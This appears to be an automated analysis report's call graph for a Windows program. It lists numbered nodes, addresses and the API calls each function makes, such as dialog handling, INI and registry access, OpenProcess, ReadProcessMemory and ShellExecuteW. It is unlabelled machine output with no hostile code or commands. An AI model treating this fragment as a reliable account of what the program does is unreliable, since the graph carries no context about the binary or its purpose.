4601->4602 4603 404109 4602->4603 4604 402952 2 API calls 4603->4604 4605 40411c 4604->4605 4606 402952 2 API calls 4605->4606 4607 40412f 4606->4607 4608 40297e 2 API calls 4607->4608 4609 404145 4608->4609 4610 40297e 2 API calls 4609->4610 4611 40415b 4610->4611 4612 40297e 2 API calls 4611->4612 4613 404174 4612->4613 4614 402952 2 API calls 4613->4614 4615 404187 4614->4615 4616 40297e 2 API calls 4615->4616 4617 4041a0 4616->4617 4618 40297e 2 API calls 4617->4618 4619 4041ba 4618->4619 4620 40297e 2 API calls 4619->4620 4621 4041cf 4620->4621 4622 40297e 2 API calls 4621->4622 4623 4041e4 4622->4623 4649 404b81 4624->4649 4626 402996 4626->4574 4628 402a32 4627->4628 4629 402a12 4627->4629 4652 4029f6 GetDlgItem 4628->4652 4632 404b81 2 API calls 4629->4632 4631 402a3f GetWindowTextLengthW 4633 402a72 4631->4633 4634 402a4c 4631->4634 4639 402a2d 4632->4639 4635 4055f9 6 API calls 4633->4635 4636 40559a 4 API calls 4634->4636 4635->4639 4637 402a57 4636->4637 4638 404b81 2 API calls 4637->4638 4638->4639 4640 4029cb 4639->4640 4653 40299c 4640->4653 4644 40295c 4643->4644 4645 40296d 4643->4645 4667 4048e5 SendDlgItemMessageW 4644->4667 4668 404905 SendDlgItemMessageW 4645->4668 4648 402968 4648->4594 4650 404b8a SetDlgItemTextW 4649->4650 4651 404b9b GetDlgItemTextW 4649->4651 4650->4626 4651->4626 4652->4631 4654 4029a6 4653->4654 4655 4029b7 4653->4655 4659 404a44 GetDlgItem SendMessageW 4654->4659 4664 404a09 GetDlgItem SendMessageW 4655->4664 4658 4029b2 4658->4582 4660 404a76 SendMessageW 4659->4660 4663 404a92 4659->4663 4661 404a87 4660->4661 4662 404a99 SendMessageW 4660->4662 4661->4660 4661->4663 4662->4663 4663->4658 4665 404a32 4664->4665 4666 404a36 SendMessageW 4664->4666 4665->4658 4666->4665 4667->4648 4668->4648 4669 40614f 4670 40b550 4669->4670 4671 40615c memset GetDlgCtrlID GetWindowTextW 4670->4671 4672 4061a0 4671->4672 4676 4061fe 4671->4676 4673 4061a9 memset GetClassNameW _wcsicmp 4672->4673 4672->4676 4674 4061f1 4673->4674 4673->4676 4675 406025 5 API calls 4674->4675 4675->4676 4680 40aad4 memset SHGetFileInfoW 4681 40ab23 DestroyIcon 4680->4681 4682 40ab2f 4680->4682 4681->4682 4683 407a55 4684 407a76 4683->4684 4685 407a69 4683->4685 4687 407a8a 4684->4687 4688 407a7b 4684->4688 4704 407491 4685->4704 4690 407a9c 4687->4690 4691 407a8f 4687->4691 4710 407362 4688->4710 4694 407ab0 4690->4694 4695 407aa1 4690->4695 4720 4075bb 4691->4720 4692 407a74 4697 407ac4 4694->4697 4698 407ab5 4694->4698 4728 407639 4695->4728 4700 407ad6 4697->4700 4701 407ac9 4697->4701 4740 407763 memset memset memset memset 4698->4740 4700->4692 4776 4079a4 4700->4776 4762 4074f2 4701->4762 4705 4074de 4704->4705 4709 407499 4704->4709 4787 407343 4705->4787 4708 407343 6 API calls 4708->4709 4709->4705 4709->4708 4716 407377 4710->4716 4718 40747c 4710->4718 4711 407343 6 API calls 4712 40748c 4711->4712 4712->4692 4713 4073a1 wcschr 4714 4073af wcschr 4713->4714 4713->4716 4714->4716 4715 40565d 7 API calls 4715->4716 4716->4713 4716->4715 4717 407343 6 API calls 4716->4717 4716->4718 4719 4055d1 free 4716->4719 4717->4716 4718->4711 4719->4716 4721 407624 4720->4721 4722 4075c9 4720->4722 4724 407343 6 API calls 4721->4724 4722->4721 4723 4075ca _snwprintf 4722->4723 4726 4075fc _snwprintf 4723->4726 4725 407634 4724->4725 4725->4692 4727 407343 6 API calls 4726->4727 4727->4722 4729 407343 6 API calls 4728->4729 4733 407672 4729->4733 4730 40774e 4731 407343 6 API calls 4730->4731 4732 40775d 4731->4732 4732->4692 4733->4730 4736 407702 wcscat 4733->4736 4797 40adc0 _snwprintf 4733->4797 4798 40adf1 4733->4798 4804 40ae90 memset memset 4733->4804 4736->4733 4739 407343 6 API calls 4739->4733 4741 4077e9 4740->4741 4742 40781b 4741->4742 4820 40adc0 _snwprintf 4741->4820 4744 407343 6 API calls 4742->4744 4747 40782a 4744->4747 4745 407804 _snwprintf 4745->4742 4746 407980 4748 407343 6 API calls 4746->4748 4747->4746 4750 407852 wcscpy 4747->4750 4754 40adf1 3 API calls 4747->4754 4755 4078f5 wcscpy 4747->4755 4758 407917 wcscat 4747->4758 4759 40ae90 13 API calls 4747->4759 4821 40adc0 _snwprintf 4747->4821 4822 40adc0 _snwprintf 4747->4822 4749 40798f 4748->4749 4751 407343 6 API calls 4749->4751 4750->4747 4752 40799e 4751->4752 4752->4692 4754->4747 4755->4747 4757 4078db _snwprintf 4757->4747 4758->4747 4760 407932 _snwprintf 4759->4760 4761 407343 6 API calls 4760->4761 4761->4747 4763 407343 6 API calls 4762->4763 4764 407530 4763->4764 4765 407343 6 API calls 4764->4765 4766 407540 4765->4766 4767 407589 4766->4767 4770 407556 _snwprintf 4766->4770 4768 407343 6 API calls 4767->4768 4769 40759f 4768->4769 4771 407343 6 API calls 4769->4771 4772 407343 6 API calls 4770->4772 4773 4075aa 4771->4773 4772->4766 4774 407343 6 API calls 4773->4774 4775 4075b5 4774->4775 4775->4692 4777 407343 6 API calls 4776->4777 4778 4079bd 4777->4778 4780 4079c5 memset 4778->4780 4782 40adf1 3 API calls 4778->4782 4786 407a40 4778->4786 4823 407250 wcscpy 4778->4823 4779 407343 6 API calls 4781 407a50 4779->4781 4780->4778 4781->4692 4782->4778 4784 407a11 _snwprintf 4785 407343 6 API calls 4784->4785 4785->4778 4786->4779 4788 407351 4787->4788 4789 407358 4787->4789 4793 40478b wcslen WriteFile 4788->4793 4794 4072d8 4789->4794 4792 407356 4792->4692 4793->4792 4795 40b550 4794->4795 4796 4072e5 memset WideCharToMultiByte strlen WriteFile 4795->4796 4796->4792 4797->4733 4803 40adfb 4798->4803 4799 40ae6d memcpy 4799->4803 4800 40ae20 memcpy 4800->4803 4801 40ae8c 4801->4733 4802 40ae53 memcpy 4802->4803 4803->4799 4803->4800 4803->4801 4803->4802 4805 40aedc 4804->4805 4806 40aef3 wcscpy 4805->4806 4807 40af77 4805->4807 4808 40af07 _snwprintf wcscat 4806->4808 4809 40af2e 4806->4809 4810 40af89 wcscat 4807->4810 4811 40af7c wcscat 4807->4811 4808->4809 4814 40af6a wcscat 4809->4814 4819 40adc0 _snwprintf 4809->4819 4812 40afa6 4810->4812 4813 40af99 wcscat 4810->4813 4811->4810 4815 40771d _snwprintf 4812->4815 4816 40afab wcscat 4812->4816 4813->4812 4814->4807 4815->4739 4816->4815 4818 40af43 _snwprintf wcscat 4818->4814 4819->4818 4820->4745 4821->4747 4822->4757 4824 407263 4823->4824 4825 407287 _wcslwr 4824->4825 4825->4784 4826 40a156 4829 409ddc 4826->4829 4830 409de9 4829->4830 4831 409e08 memset 4830->4831 4832 409e3b memset GetPrivateProfileStringW 4830->4832 4837 40512f 4831->4837 4841 4051b8 wcslen 4832->4841 4836 409e7a 4838 4051a3 WritePrivateProfileStringW 4837->4838 4840 405143 4837->4840 4838->4836 4839 405151 _snwprintf memcpy 4839->4838 4839->4840 4840->4838 4840->4839 4842 4051cc 4841->4842 4843 4051ce 4841->4843 4842->4836 4844 405222 4843->4844 4845 405204 wcstoul 4843->4845 4844->4836 4845->4843 4846 40b5d9 4853 402923 memset 4846->4853 4848 40b5e4 memset 4849 40171f memset 4848->4849 4850 40b609 4849->4850 4851 40b23c 2 API calls 4850->4851 4852 40b61d 4851->4852 4853->4848 4854 408adb 4855 408ae8 4854->4855 4856 408b71 4855->4856 4862 408af5 4855->4862 4885 404da9 GetSystemMetrics GetSystemMetrics 4856->4885 4858 408dbf 4859 408b7b 8 API calls 4860 408c43 4859->4860 4861 408c59 ReadProcessMemory 4859->4861 4893 404fe0 memset 4860->4893 4866 408c75 4861->4866 4867 408c88 4861->4867 4862->4858 4863 408b19 EndDialog 4862->4863 4864 408b26 4862->4864 4863->4864 4864->4858 4868 408b30 GetDlgItem SendMessageW SendMessageW SendMessageW 4864->4868 4870 404fe0 5 API calls 4866->4870 4900 404bd3 4867->4900 4868->4858 4870->4867 4873 408c93 4903 409172 4873->4903 4874 408c9a 4915 4090ee 4874->4915 4877 408c98 4878 408caf memset GetCurrentProcessId 4877->4878 4879 408d28 _snwprintf SetDlgItemTextW GetDlgItem SetFocus 4877->4879 4923 4092f0 4878->4923 4879->4858 4882 408ced memcpy 4882->4879 4883 408d0e 4882->4883 4884 408d19 wcscpy 4883->4884 4884->4879 4886 404dd0 4885->4886 4887 404dd4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 4885->4887 4886->4887 4888 404dfa GetWindowRect 4886->4888 4887->4888 4889 404e0f GetParent 4888->4889 4891 404e49 MoveWindow 4888->4891 4890 404e1e GetWindowRect 4889->4890 4889->4891 4890->4891 4891->4859 4894 40500e _snwprintf 4893->4894 4895 405040 4894->4895 4896 405033 wcscat 4894->4896 4897 40505d wcscat 4895->4897 4898 405050 wcscat 4895->4898 4896->4895 4897->4894 4899 405075 4897->4899 4898->4897 4899->4861 4901 404baf GetVersionExW 4900->4901 4902 404bd8 4901->4902 4902->4873 4902->4874 4904 409208 4903->4904 4905 40917f 4903->4905 4904->4877 4906 405436 8 API calls 4905->4906 4907 40918a 4906->4907 4907->4904 4908 409191 GetProcAddress 4907->4908 4909 4091a9 GetProcAddress 4908->4909 4914 4091ed 4908->4914 4911 4091ba GetProcAddress 4909->4911 4909->4914 4910 409201 FreeLibrary 4910->4904 4912 4091cb GetProcAddress 4911->4912 4911->4914 4913 4091dc GetProcAddress 4912->4913 4912->4914 4913->4914 4914->4904 4914->4910 4916 409165 4915->4916 4917 4090f7 GetModuleHandleW 4915->4917 4916->4877 4917->4916 4918 409109 GetProcAddress 4917->4918 4918->4916 4919 409121 GetProcAddress 4918->4919 4919->4916 4920 409132 GetProcAddress 4919->4920 4920->4916 4921 409143 GetProcAddress 4920->4921 4921->4916 4922 409154 GetProcAddress 4921->4922 4922->4916 4924 409300 4923->4924 4925 404bd3 GetVersionExW 4924->4925 4926 40930e 4925->4926 4927 409322 OpenProcess 4926->4927 4933 409433 4926->4933 4928 408ce3 4927->4928 4936 40933d 4927->4936 4928->4879 4928->4882 4929 4094fb CloseHandle 4929->4928 4930 409377 memset memset 4930->4936 4931 40947d memset wcscpy 4932 409510 memcpy 4931->4932 4932->4933 4933->4928 4933->4929 4933->4931 4934 40920a 14 API calls 4934->4936 4936->4929 4936->4930 4936->4934 4937 40942e 4936->4937 4938 409510 4936->4938 4937->4929 4939 409520 4938->4939 4940 40954f 4938->4940 4939->4940 4941 40952e memcpy 4939->4941 4940->4936 4941->4940 4942 40b65c 4943 40b665 ??3@YAXPAX 4942->4943 4944 40b66c 4942->4944 4943->4944 4945 4070df 4946 4070f4 4945->4946 4947 40715b 4945->4947 4946->4947 4948 407102 memset 4946->4948 4949 407125 4948->4949 4949->4947 4950 407129 _snwprintf SendMessageW 4949->4950 4950->4947 4951 4030e0 4952 4030e9 4951->4952 4956 403107 4951->4956 4957 40304d memset wcscat 4952->4957 4954 4030f2 4955 404923 2 API calls 4954->4955 4954->4956 4955->4956 4958 40585c _wcsicmp 4957->4958 4959 403095 4958->4959 4959->4954 4960 4081e4 4961 4081f1 4960->4961 4962 407343 6 API calls 4961->4962 4963 408205 memset memset memset 4962->4963 4964 408276 4963->4964 4965 40825c _snwprintf 4963->4965 4966 408291 4964->4966 4967 40827e wcscpy 4964->4967 4965->4964 4975 407afd 4966->4975 4967->4966 4971 407343 6 API calls 4972 4082ec 4971->4972 4973 4082fa 4972->4973 4980 407d03 ??2@YAPAXI 4972->4980 4976 40b550 4975->4976 4977 407b0a _snwprintf 4976->4977 4978 407343 6 API calls 4977->4978 4979 407b57 _snwprintf 4978->4979 4979->4971 4981 407d28 4980->4981 4984 407b5d 4981->4984 4985 40b550 4984->4985 4986 407b6a memset memset memset 4985->4986 4987 407be4 4986->4987 4988 407bbb 4986->4988 4990 407c24 _snwprintf 4987->4990 5002 40adc0 _snwprintf 4987->5002 5001 40adc0 _snwprintf 4988->5001 4993 407343 6 API calls 4990->4993 4991 407bca _snwprintf 4991->4987 4997 407c56 4993->4997 4994 407bf9 _snwprintf wcscpy 4994->4990 4995 407cfc ??3@YAXPAX 4995->4973 4996 407c6b memset 4996->4997 4998 407c8a _snwprintf 4996->4998 4997->4995 4997->4996 4999 407cad _snwprintf 4997->4999 4998->4999 5000 407343 6 API calls 4999->5000 5000->4997 5001->4991 5002->4994 5003 40a7e5 5004 40a826 5003->5004 5005 40a7ef 5003->5005 5006 40a80a 5005->5006 5009 406bba 5005->5009 5006->5004 5008 40a81b EndDialog 5006->5008 5008->5004 5010 406c08 5009->5010 5020 406bc7 5009->5020 5010->5020 5021 40331d SendMessageW 5010->5021 5013 406cc3 5013->5006 5014 406c5a 5015 406c85 5014->5015 5022 403331 SendMessageW 5014->5022 5023 40331d SendMessageW 5015->5023 5018 406c9f 5024 403331 SendMessageW 5018->5024 5025 406b82 5020->5025 5021->5014 5022->5014 5023->5018 5024->5020 5026 406ba0 SendMessageW 5025->5026 5027 406b91 5025->5027 5026->5013 5032 40844d 5027->5032 5031 406b9e 5031->5013 5036 408473 5032->5036 5033 4084d3 5034 408502 5033->5034 5039 4084e5 5033->5039 5035 40851a qsort 5034->5035 5037 406b99 5035->5037 5036->5033 5044 4083dc ??2@YAPAXI 5036->5044 5041 406e57 5037->5041 5040 4083dc 5 API calls 5039->5040 5040->5037 5049 406842 5041->5049 5045 4083f8 5044->5045 5046 40843f ??3@YAXPAX 5044->5046 5047 40840c memcpy memcpy memcpy 5045->5047 5046->5033 5047->5047 5048 40843e 5047->5048 5048->5046 5052 4033e7 SendMessageW 5049->5052 5051 40684d SendMessageW 5051->5031 5052->5051 5053 40b6e7 5054 40b6f0 FreeLibrary 5053->5054 5055 40b6f7 5053->5055 5054->5055 5056 40a9ea 5057 40aa06 5056->5057 5058 4095fd 49 API calls 5057->5058 5059 40aa0c 5058->5059 5070 4097a9 5059->5070 5061 40aabf 5062 4095da 2 API calls 5061->5062 5064 40aac8 5062->5064 5063 40aa2f GetCurrentProcessId 5068 40aa16 5063->5068 5066 404923 2 API calls 5066->5068 5067 409a94 23 API calls 5067->5068 5068->5061 5068->5063 5068->5066 5068->5067 5083 40a909 5068->5083 5086 40715e 5068->5086 5071 4097b6 5070->5071 5096 408e31 5071->5096 5075 408e31 13 API calls 5077 409815 5075->5077 5076 4098e9 ??3@YAXPAX 5076->5068 5077->5076 5078 404923 2 API calls 5077->5078 5079 404923 2 API calls 5077->5079 5080 40987d memcpy 5078->5080 5081 4098b6 memcpy 5079->5081 5080->5077 5082 4099ed 4 API calls 5081->5082 5082->5077 5099 404fa4 memset 5083->5099 5085 40a927 5085->5068 5088 4071a4 5086->5088 5094 407170 5086->5094 5087 4071cd 5089 4071f1 free 5087->5089 5090 407215 5087->5090 5088->5087 5091 4071fa memcpy 5088->5091 5092 407227 5089->5092 5093 404951 3 API calls 5090->5093 5091->5094 5095 407231 memcpy 5092->5095 5093->5092 5094->5068 5095->5094 5097 408f29 ??2@YAPAXI memset 5096->5097 5098 408e3e 13 API calls 5096->5098 5097->5075 5098->5097 5099->5085 5100 4041eb 5101 40420a memset DragQueryFileW DragFinish 5100->5101 5109 404264 5100->5109 5103 40424d 5101->5103 5102 40427b BeginDeferWindowPos 5139 402e22 GetDlgItem GetClientRect 5102->5139 5106 404923 2 API calls 5103->5106 5104 4043ba 5112 4043c8 5104->5112 5143 402ec8 6 API calls 5104->5143 5106->5109 5109->5102 5109->5104 5110 402e22 3 API calls 5111 4042aa 5110->5111 5113 402e22 3 API calls 5111->5113 5114 4042bd 5113->5114 5115 402e22 3 API calls 5114->5115 5116 4042d0 5115->5116 5117 402e22 3 API calls 5116->5117 5118 4042e3 5117->5118 5119 402e22 3 API calls 5118->5119 5120 4042f6 5119->5120 5121 402e22 3 API calls 5120->5121 5122 404309 5121->5122 5123 402e22 3 API calls 5122->5123 5124 40431c 5123->5124 5125 402e22 3 API calls 5124->5125 5126 40432f 5125->5126 5127 402e22 3 API calls 5126->5127 5128 404342 5127->5128 5129 402e22 3 API calls 5128->5129 5130 404355 5129->5130 5131 402e22 3 API calls 5130->5131 5132 404368 5131->5132 5133 402e22 3 API calls 5132->5133 5134 40437b 5133->5134 5135 402e22 3 API calls 5134->5135 5136 40438e 5135->5136 5137 402e22 3 API calls 5136->5137 5138 4043a1 EndDeferWindowPos InvalidateRect 5137->5138 5138->5112 5140 402e56 5139->5140 5141 402ebb 5140->5141 5142 402e6b DeferWindowPos 5140->5142 5141->5110 5142->5141 5143->5112 5147 407ef0 5148 407f7f 5147->5148 5149 407f06 5147->5149 5149->5148 5150 407f37 wcscmp 5149->5150 5151 407f3e _wcsicmp 5149->5151 5153 40488d 3 API calls 5149->5153 5154 404835 wcslen wcslen 5149->5154 5150->5149 5151->5149 5153->5149 5155 404880 5154->5155 5156 40485c 5154->5156 5155->5149 5156->5155 5157 404864 memcmp 5156->5157 5157->5155 5157->5156 5158 403a73 5159 403afa CallWindowProcW 5158->5159 5160 403a7f 5158->5160 5160->5159 5161 403a85 GetKeyState 5160->5161 5175 403a60 GetKeyState 5161->5175 5163 403a98 5164 403aa8 5163->5164 5176 403a60 GetKeyState 5163->5176 5164->5159 5177 403a60 GetKeyState 5164->5177 5167 403ab7 5167->5159 5178 403a60 GetKeyState 5167->5178 5169 403ac6 5169->5159 5179 403a60 GetKeyState 5169->5179 5171 403ad5 5171->5159 5180 403a60 GetKeyState 5171->5180 5173 403ae4 5173->5159 5174 403ae9 SendMessageW 5173->5174 5174->5159 5175->5163 5176->5164 5177->5167 5178->5169 5179->5171 5180->5173 5181 40b477 _XcptFilter 5182 403377 SendMessageW 5183 403396 5182->5183 5185 4033ab 5182->5185 5183->5185 5186 4032f6 SendMessageW 5183->5186 5186->5185 5187 405cf8 5188 405d55 5187->5188 5189 405d08 GetParent GetWindowRect GetClientRect MapWindowPoints SetWindowPos 5187->5189 5190 405d61 5188->5190 5192 404fbb GetWindowLongW SetWindowLongW 5188->5192 5189->5188 5192->5190 5196 40a17b 5199 409d5f 5196->5199 5198 40a19f 5200 409d6c 5199->5200 5201 409d72 5200->5201 5202 409dc4 GetPrivateProfileStringW 5200->5202 5203 409db2 5201->5203 5204 409d76 wcschr 5201->5204 5202->5198 5206 409db6 WritePrivateProfileStringW 5203->5206 5204->5203 5205 409d84 _snwprintf 5204->5205 5205->5206 5206->5198 5207 407d80 memset memset 5208 407dc9 5207->5208 5209 407343 6 API calls 5208->5209 5210 407ddd 5209->5210 5211 407250 2 API calls 5210->5211 5212 407df0 _snwprintf 5211->5212 5213 407343 6 API calls 5212->5213 5214 407e1d 5213->5214 5215 40ac81 memset 5216 40acae 5215->5216 5219 40acc5 5215->5219 5217 40acb1 SHGetPathFromIDListW 5216->5217 5218 40acf6 5216->5218 5217->5218 5217->5219 5219->5218 5220 40aced SendMessageW 5219->5220 5220->5218 5221 408182 5222 4081a2 5221->5222 5223 408193 5221->5223 5224 4081ba 5222->5224 5226 407343 6 API calls 5222->5226 5225 407343 6 API calls 5223->5225 5227 407343 6 API calls 5224->5227 5225->5222 5226->5224 5228 4081d7 5227->5228 5229 408382 5230 408397 5229->5230 5231 4083ac 5230->5231 5233 408301 5230->5233 5235 40830e 5233->5235 5234 408377 5234->5230 5235->5234 5236 40836f _wcsicmp 5235->5236 5236->5234 5237 403c03 5310 403b3c memset memset 5237->5310 5241 403c16 DragAcceptFiles GetDlgItem SetWindowLongW 5325 402ddd GetClientRect GetWindow GetWindow 5241->5325 5245 403cb8 GetDlgItem 5246 40ad85 10 API calls 5245->5246 5247 403cca GetDlgItem 5246->5247 5248 405b81 16 API calls 5247->5248 5249 403ce4 5248->5249 5335 4049d9 SendMessageW SendMessageW 5249->5335 5251 403ceb 5252 405b81 16 API calls 5251->5252 5253 403cf6 5252->5253 5336 4049d9 SendMessageW SendMessageW 5253->5336 5255 403cfd 5256 405b81 16 API calls 5255->5256 5257 403d0f 5256->5257 5337 4049d9 SendMessageW SendMessageW 5257->5337 5259 403d16 5260 405b81 16 API calls 5259->5260 5261 403d24 5260->5261 5338 4049d9 SendMessageW SendMessageW 5261->5338 5263 403d2b 5264 405b81 16 API calls 5263->5264 5265 403d3d 5264->5265 5339 4049d9 SendMessageW SendMessageW 5265->5339 5267 403d44 5268 405b81 16 API calls 5267->5268 5269 403d52 5268->5269 5340 4049d9 SendMessageW SendMessageW 5269->5340 5271 403d59 GetDlgItem 5272 405b81 16 API calls 5271->5272 5273 403d74 5272->5273 5341 4049d9 SendMessageW SendMessageW 5273->5341 5275 403d7b 5276 405b81 16 API calls 5275->5276 5277 403d86 5276->5277 5342 4049d9 SendMessageW SendMessageW 5277->5342 5279 403d8d 5280 405b81 16 API calls 5279->5280 5281 403d9c 5280->5281 5343 4049d9 SendMessageW SendMessageW 5281->5343 5283 403da3 5284 405b81 16 API calls 5283->5284 5285 403dae 5284->5285 5344 4049d9 SendMessageW SendMessageW 5285->5344 5287 403db5 GetDlgItem 5288 403dc9 5287->5288 5289 405b81 16 API calls 5288->5289 5291 403de8 GetDlgItem 5288->5291 5345 4049d9 SendMessageW SendMessageW 5288->5345 5289->5288 5292 403df9 5291->5292 5293 405b81 16 API calls 5292->5293 5295 403e18 GetDlgItem 5292->5295 5346 4049d9 SendMessageW SendMessageW 5292->5346 5293->5292 5296 403e28 5295->5296 5297 405b81 16 API calls 5296->5297 5299 403e47 GetDlgItem 5296->5299 5347 4049d9 SendMessageW SendMessageW 5296->5347 5297->5296 5300 403e57 5299->5300 5301 405b81 16 API calls 5300->5301 5303 403e76 SendDlgItemMessageW 5300->5303 5348 4049d9 SendMessageW SendMessageW 5300->5348 5301->5300 5349 403ec3 5303->5349 5308 402bee 7 API calls 5309 403eb4 5308->5309 5374 404ad9 GetModuleFileNameW 5310->5374 5312 403b87 _snwprintf 5313 404923 2 API calls 5312->5313 5314 403bbe 5313->5314 5315 404923 2 API calls 5314->5315 5316 403bd3 5315->5316 5317 404923 2 API calls 5316->5317 5318 403bea 5317->5318 5375 40467a 5318->5375 5321 403b16 5322 403b25 5321->5322 5323 405b81 16 API calls 5322->5323 5324 403b2b SetDlgItemTextW 5323->5324 5324->5241 5326 402e0e 5325->5326 5385 402d99 GetWindowRect MapWindowPoints 5326->5385 5328 402e13 GetWindow 5328->5326 5329 402e1e 7 API calls 5328->5329 5330 40ad85 5329->5330 5331 405436 8 API calls 5330->5331 5332 40ad93 GetProcAddress 5331->5332 5333 40adb4 FreeLibrary 5332->5333 5334 40ada7 5332->5334 5333->5245 5334->5333 5335->5251 5336->5255 5337->5259 5338->5263 5339->5267 5340->5271 5341->5275 5342->5279 5343->5283 5344->5287 5345->5288 5346->5292 5347->5296 5348->5300 5386 402a89 GetDlgItem EnableWindow 5349->5386 5351 403ed6 5387 402a89 GetDlgItem EnableWindow 5351->5387 5353 403ee8 5388 402a89 GetDlgItem EnableWindow 5353->5388 5355 403f03 5389 402a89 GetDlgItem EnableWindow 5355->5389 5357 403f18 5390 402a89 GetDlgItem EnableWindow 5357->5390 5359 403f3d 5391 402a89 GetDlgItem EnableWindow 5359->5391 5361 403f61 5392 402a89 GetDlgItem EnableWindow 5361->5392 5363 403f85 5393 402a89 GetDlgItem EnableWindow 5363->5393 5365 403f9e 5394 402a89 GetDlgItem EnableWindow 5365->5394 5367 403fb7 5395 402a89 GetDlgItem EnableWindow 5367->5395 5369 403e92 GetDlgItem SetFocus 5370 402d78 5369->5370 5371 402d82 5370->5371 5372 404da9 10 API calls 5371->5372 5373 402d93 5372->5373 5373->5308 5374->5312 5381 4043f8 5375->5381 5378 403bf4 5378->5321 5379 40469b memset _snwprintf RegOpenKeyExW 5379->5378 5380 4046f0 RegCloseKey 5379->5380 5380->5378 5384 409eb3 RegOpenKeyExW 5381->5384 5383 40440f 5383->5378 5383->5379 5384->5383 5385->5328 5386->5351 5387->5353 5388->5355 5389->5357 5390->5359 5391->5361 5392->5363 5393->5365 5394->5367 5395->5369 5396 40b688 5399 401a2f 5396->5399 5400 4055d1 free 5399->5400 5401 401a3d 5400->5401 5402 406f09 5403 406f6f 5402->5403 5404 406f1f 5402->5404 5406 406842 SendMessageW 5403->5406 5405 406f4d SendMessageW 5404->5405 5420 407075 5405->5420 5417 406fa9 5406->5417 5408 406f6a 5409 407042 5409->5408 5411 407058 5409->5411 5414 407075 11 API calls 5409->5414 5411->5408 5446 40684f 5411->5446 5412 40700d 5412->5409 5440 406e8a 5412->5440 5413 406fcb SendMessageW 5413->5417 5414->5411 5417->5412 5417->5413 5424 406ccb 5417->5424 5428 406dea 5417->5428 5434 406d44 5417->5434 5421 407087 5420->5421 5422 406bba 11 API calls 5421->5422 5423 407094 5422->5423 5423->5408 5425 406ce1 5424->5425 5427 406cdc 5424->5427 5426 4031e2 SendMessageW 5425->5426 5426->5427 5427->5417 5429 406e51 5428->5429 5432 406df7 5428->5432 5429->5417 5431 406e22 wcscmp 5431->5432 5432->5429 5432->5431 5449 403421 SendMessageW 5432->5449 5450 4033fb SendMessageW 5432->5450 5435 406d56 5434->5435 5451 4032f6 SendMessageW 5435->5451 5437 406dae 5438 406de1 5437->5438 5452 4032b5 SendMessageW 5437->5452 5438->5417 5441 406e9c 5440->5441 5453 40325c 5441->5453 5443 406ef9 5444 406dea 3 API calls 5443->5444 5445 406f03 5444->5445 5445->5412 5456 4031bc SendMessageW 5446->5456 5448 406866 5448->5408 5449->5432 5450->5432 5451->5437 5452->5438 5454 403283 wcslen 5453->5454 5455 40328d SendMessageW 5453->5455 5454->5455 5455->5443 5456->5448 5457 40b48b 5458 40b497 _exit 5457->5458 5459 40b49e _c_exit 5457->5459 5458->5459 5460 40b4a4 5459->5460 5461 40620e 5462 40621b 5461->5462 5463 406224 5462->5463 5469 40625f 5462->5469 5478 405e8d 5463->5478 5465 40632d 5466 40622f LoadMenuW 5485 40605e 5466->5485 5467 405e8d 2 API calls 5470 406294 CreateDialogParamW 5467->5470 5469->5465 5469->5467 5472 4062b2 GetDesktopWindow CreateDialogParamW 5470->5472 5473 4062c6 memset GetWindowTextW 5470->5473 5472->5473 5474 406300 5473->5474 5475 406315 EnumChildWindows DestroyWindow 5473->5475 5476 405fac 3 API calls 5474->5476 5475->5465 5477 406312 5476->5477 5477->5475 5479 405e9d 5478->5479 5481 405e92 _snwprintf 5478->5481 5479->5481 5482 405ebb 5479->5482 5481->5466 5483 405ed0 wcscpy 5482->5483 5484 405edc 5482->5484 5483->5484 5484->5466 5486 40b550 5485->5486 5487 40606e GetMenuItemCount 5486->5487 5488 406148 DestroyMenu 5487->5488 5489 406088 memset GetMenuItemInfoW 5487->5489 5488->5465 5492 4060d9 5489->5492 5490 4060e0 wcschr 5490->5492 5491 40605e 5 API calls 5491->5492 5492->5488 5492->5489 5492->5490 5492->5491 5493 406025 5 API calls 5492->5493 5493->5492 5500 40a10f WritePrivateProfileStringW 5501 40b590 5502 40b23c 2 API calls 5501->5502 5503 40b59a 5502->5503 5507 401093 5508 401270 5507->5508 5509 4010ab 5507->5509 5510 4012a6 SetDlgItemTextW 5508->5510 5511 40127a GetDlgItem ShowWindow GetDlgItem ShowWindow 5508->5511 5512 401231 5509->5512 5513 4010b2 5509->5513 5514 4012b9 SetWindowTextW SetDlgItemTextW SetDlgItemTextW 5510->5514 5511->5514 5517 401252 EndDialog DeleteObject 5512->5517 5536 401113 5512->5536 5515 4011d3 GetDlgItem 5513->5515 5516 4010bb 5513->5516 5538 40103e 5514->5538 5519 4011e8 SetBkMode SetTextColor GetSysColorBrush 5515->5519 5520 40120e 5515->5520 5521 401151 GetDlgItem ChildWindowFromPoint 5516->5521 5522 4010c6 5516->5522 5517->5508 5519->5536 5527 40121c GetDlgItem 5520->5527 5520->5536 5523 4011a4 5521->5523 5524 401187 GetModuleHandleW LoadCursorW SetCursor 5521->5524 5526 4010ce GetDlgItem ChildWindowFromPoint 5522->5526 5522->5536 5528 4011b2 GetDlgItem ChildWindowFromPoint 5523->5528 5523->5536 5524->5536 5530 401104 5526->5530 5531 40111d 5526->5531 5532 40122f 5527->5532 5527->5536 5534 4011d1 5528->5534 5528->5536 5529 404da9 10 API calls 5529->5536 5537 404f7e ShellExecuteW 5530->5537 5533 40112b GetDlgItem ChildWindowFromPoint 5531->5533 5531->5536 5532->5519 5533->5530 5533->5536 5534->5524 5537->5536 5543 404aeb memset wcscpy 5538->5543 5540 40104d CreateFontIndirectW SendDlgItemMessageW 5541 401090 5540->5541 5542 40107c SendDlgItemMessageW 5540->5542 5541->5529 5542->5541 5543->5540 5544 407294 5545 4072a3 5544->5545 5548 404c96 5545->5548 5549 404cac 5548->5549 5557 404ca5 5548->5557 5558 404c70 modf 5549->5558 5551 404cd7 5559 404c70 modf 5551->5559 5553 404d39 5560 404c70 modf 5553->5560 5555 404d63 5561 404c70 modf 5555->5561 5558->5551 5559->5553 5560->5555 5561->5557 5562 402b16 5565 408dc8 5562->5565 5564 402b24 5566 408dd4 5565->5566 5567 408dd9 memcpy memcpy GetModuleHandleW DialogBoxParamW 5565->5567 5566->5564 5567->5564 5568 40b217 _onexit 5569 40a998 5570 40a9bc 5569->5570 5571 40a99f 5569->5571 5570->5571 5572 40a9c3 CompareFileTime 5570->5572 5572->5571 5576 402b9c 5577 405ce7 GetModuleHandleW 5576->5577 5578 402bb7 CreateDialogParamW 5577->5578 5583 405e0a 5578->5583 5584 405e17 5583->5584 5585 402bc8 5584->5585 5586 405e2e memset 5584->5586 5593 405d6a 5585->5593 5587 405e8d 2 API calls 